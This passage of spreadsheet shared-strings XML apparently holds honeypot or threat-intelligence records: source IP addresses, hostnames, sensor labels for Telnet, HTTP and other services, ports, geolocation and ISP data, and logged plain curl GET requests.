    <t>d329a770c9e8557e4ced21c11426d8f9</t>
  </si>
  <si>
    <t>220.132.38.35</t>
  </si>
  <si>
    <t>220-132-38-35.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:dc84:2623</t>
  </si>
  <si>
    <t>4499dc80ab91778143c7c1d391cac2fd</t>
  </si>
  <si>
    <t>114.35.2.131</t>
  </si>
  <si>
    <t>114-35-2-131.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;445&amp;&amp;37932&amp;&amp;53875&amp;&amp;9100&amp;&amp;38854&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7223:283</t>
  </si>
  <si>
    <t>4626a98335d6865ddd71708d6fdd27d9</t>
  </si>
  <si>
    <t>61.3.113.220</t>
  </si>
  <si>
    <t>::ffff:3d03:71dc</t>
  </si>
  <si>
    <t>6812af2474bbb63edc553d6ea7bffbcb</t>
  </si>
  <si>
    <t>113.160.196.115</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_DNS_H10&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;53&amp;&amp;786&amp;&amp;3306</t>
  </si>
  <si>
    <t>67</t>
  </si>
  <si>
    <t>Nam Định Province</t>
  </si>
  <si>
    <t>Huyện Xuân Trường</t>
  </si>
  <si>
    <t>Xuân Trường</t>
  </si>
  <si>
    <t>8554356</t>
  </si>
  <si>
    <t>20.2923</t>
  </si>
  <si>
    <t>106.333</t>
  </si>
  <si>
    <t>::ffff:71a0:c473</t>
  </si>
  <si>
    <t>a5de1cb39d804bb35369b8af3c351a01</t>
  </si>
  <si>
    <t>60.140.163.90</t>
  </si>
  <si>
    <t>NA&amp;&amp;softbank060140163090.bbtec.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;16108&amp;&amp;NA</t>
  </si>
  <si>
    <t>Minato-ku</t>
  </si>
  <si>
    <t>1857091</t>
  </si>
  <si>
    <t>35.6629</t>
  </si>
  <si>
    <t>139.761</t>
  </si>
  <si>
    <t>17676</t>
  </si>
  <si>
    <t>SoftBank Corp.</t>
  </si>
  <si>
    <t>Japan Nation-wide Network of Softbank Corp.</t>
  </si>
  <si>
    <t>2004-05-20</t>
  </si>
  <si>
    <t>BBTEC</t>
  </si>
  <si>
    <t>::ffff:3c8c:a35a</t>
  </si>
  <si>
    <t>fae34a8f03e8d33b40b9d739904181b7</t>
  </si>
  <si>
    <t>125.228.183.243</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-183-243.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>::ffff:7de4:b7f3</t>
  </si>
  <si>
    <t>6bf3071e81157970cd6aa302bd72469b</t>
  </si>
  <si>
    <t>117.221.122.163</t>
  </si>
  <si>
    <t>::ffff:75dd:7aa3</t>
  </si>
  <si>
    <t>5667ca01507afd81ba8274a7e493c174</t>
  </si>
  <si>
    <t>91.90.123.9</t>
  </si>
  <si>
    <t>Belgium</t>
  </si>
  <si>
    <t>BRU</t>
  </si>
  <si>
    <t>Brussels Capital</t>
  </si>
  <si>
    <t>Bruxelles-Capitale</t>
  </si>
  <si>
    <t>Saint-Gilles</t>
  </si>
  <si>
    <t>2787413</t>
  </si>
  <si>
    <t>1060</t>
  </si>
  <si>
    <t>50.8276</t>
  </si>
  <si>
    <t>4.34389</t>
  </si>
  <si>
    <t>M247 Ltd Brussels</t>
  </si>
  <si>
    <t>::ffff:5b5a:7b09</t>
  </si>
  <si>
    <t>3bf6ca4c77f5d9cafea2976b1fa6ba86</t>
  </si>
  <si>
    <t>125.229.151.234</t>
  </si>
  <si>
    <t>125-229-151-234.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;4962&amp;&amp;23&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:97ea</t>
  </si>
  <si>
    <t>495b0f93d1b0751654f42e4770089bf6</t>
  </si>
  <si>
    <t>114.35.33.52</t>
  </si>
  <si>
    <t>114-35-33-52.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;61071&amp;&amp;23&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7223:2134</t>
  </si>
  <si>
    <t>b8e4d88fb1c59a0931e386dabc51a9d0</t>
  </si>
  <si>
    <t>117.242.200.74</t>
  </si>
  <si>
    <t>::ffff:75f2:c84a</t>
  </si>
  <si>
    <t>a63edc042c70ab64adb9938e533598d2</t>
  </si>
  <si>
    <t>59.88.169.103</t>
  </si>
  <si>
    <t>::ffff:3b58:a967</t>
  </si>
  <si>
    <t>df3b2102913f8fdbdad65742a12a3540</t>
  </si>
  <si>
    <t>59.126.250.86</t>
  </si>
  <si>
    <t>59-126-250-86.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_NTP_H11&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;123&amp;&amp;389&amp;&amp;41332&amp;&amp;5947&amp;&amp;39380&amp;&amp;80&amp;&amp;23&amp;&amp;33037&amp;&amp;NA</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;NA&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:fa56</t>
  </si>
  <si>
    <t>3bc3d54a3dd5c367d338e37afaba70ff</t>
  </si>
  <si>
    <t>93.41.182.249</t>
  </si>
  <si>
    <t>NA&amp;&amp;93-41-182-249.ip82.fastwebnet.it</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;56154</t>
  </si>
  <si>
    <t>12874</t>
  </si>
  <si>
    <t>Fastweb SpA</t>
  </si>
  <si>
    <t>Fastweb POP Internet Singolo</t>
  </si>
  <si>
    <t>::ffff:5d29:b6f9</t>
  </si>
  <si>
    <t>27ba962a2158675166900f5cc0754f4d</t>
  </si>
  <si>
    <t>117.206.89.177</t>
  </si>
  <si>
    <t>::ffff:75ce:59b1</t>
  </si>
  <si>
    <t>8ede2e7d8c002bb29c197cb262f223e1</t>
  </si>
  <si>
    <t>171.239.191.119</t>
  </si>
  <si>
    <t>10.823</t>
  </si>
  <si>
    <t>Vietel</t>
  </si>
  <si>
    <t>::ffff:abef:bf77</t>
  </si>
  <si>
    <t>cbaf8b12b04a89c36052c70d15a1318b</t>
  </si>
  <si>
    <t>117.206.139.70</t>
  </si>
  <si>
    <t>::ffff:75ce:8b46</t>
  </si>
  <si>
    <t>aa74d18c5146b15769094e0b000d1ce6</t>
  </si>
  <si>
    <t>220.132.148.108</t>
  </si>
  <si>
    <t>220-132-148-108.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;48490&amp;&amp;23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:dc84:946c</t>
  </si>
  <si>
    <t>d5088086388bb7adcc75f9ec9e039aa8</t>
  </si>
  <si>
    <t>179.116.27.65</t>
  </si>
  <si>
    <t>::ffff:b374:1b41</t>
  </si>
  <si>
    <t>5894b2c40092b460db8191aa512b1f95</t>
  </si>
  <si>
    <t>220.132.181.221</t>
  </si>
  <si>
    <t>220-132-181-221.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;43325&amp;&amp;23&amp;&amp;80&amp;&amp;11658&amp;&amp;46991&amp;&amp;47010&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:dc84:b5dd</t>
  </si>
  <si>
    <t>9155c23b4021992aac79997f42cb2cb6</t>
  </si>
  <si>
    <t>117.205.115.218</t>
  </si>
  <si>
    <t>::ffff:75cd:73da</t>
  </si>
  <si>
    <t>4cc7711794051dbefa85c90053f853e0</t>
  </si>
  <si>
    <t>117.251.166.95</t>
  </si>
  <si>
    <t>::ffff:75fb:a65f</t>
  </si>
  <si>
    <t>55d1ab22754b98e81e178328e8ef7317</t>
  </si>
  <si>
    <t>117.199.213.212</t>
  </si>
  <si>
    <t>::ffff:75c7:d5d4</t>
  </si>
  <si>
    <t>e7ae51283fb87ca7e53226eba4287d26</t>
  </si>
  <si>
    <t>117.241.86.178</t>
  </si>
  <si>
    <t>::ffff:75f1:56b2</t>
  </si>
  <si>
    <t>58ec346f84529da4bc8ba29b591bbe98</t>
  </si>
  <si>
    <t>59.89.203.52</t>
  </si>
  <si>
    <t>::ffff:3b59:cb34</t>
  </si>
  <si>
    <t>19401a0edba4476f3daba03fa62aea7e</t>
  </si>
  <si>
    <t>175.136.215.116</t>
  </si>
  <si>
    <t>3.13687</t>
  </si>
  <si>
    <t>Telekom Malaysia Berhad</t>
  </si>
  <si>
    <t>::ffff:af88:d774</t>
  </si>
  <si>
    <t>40560a646353001b483c2cc27a8422d3</t>
  </si>
  <si>
    <t>220.134.6.194</t>
  </si>
  <si>
    <t>220-134-6-194.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5856&amp;&amp;4145&amp;&amp;59399&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:dc86:6c2</t>
  </si>
  <si>
    <t>5207d11d8fabc69488e28a9b88fce8a3</t>
  </si>
  <si>
    <t>59.126.25.244</t>
  </si>
  <si>
    <t>59-126-25-244.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_SSH_H37&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;1080&amp;&amp;22&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;63175&amp;&amp;50447&amp;&amp;55629&amp;&amp;55639&amp;&amp;55644&amp;&amp;55647&amp;&amp;55653&amp;&amp;55655&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:3b7e:19f4</t>
  </si>
  <si>
    <t>7ea04885a829c2fd7b53fb851a6a10ff</t>
  </si>
  <si>
    <t>95.9.75.216</t>
  </si>
  <si>
    <t>38</t>
  </si>
  <si>
    <t>Kayseri</t>
  </si>
  <si>
    <t>308464</t>
  </si>
  <si>
    <t>38.7205</t>
  </si>
  <si>
    <t>35.4826</t>
  </si>
  <si>
    <t>::ffff:5f09:4bd8</t>
  </si>
  <si>
    <t>3802ed3db3916b7d88ad1d558db68bc8</t>
  </si>
  <si>
    <t>116.118.161.14</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>Xinli</t>
  </si>
  <si>
    <t>11703047</t>
  </si>
  <si>
    <t>::ffff:7476:a10e</t>
  </si>
  <si>
    <t>1d89e33f45dc8403b5de4760a6fa9c92</t>
  </si>
  <si>
    <t>114.34.15.131</t>
  </si>
  <si>
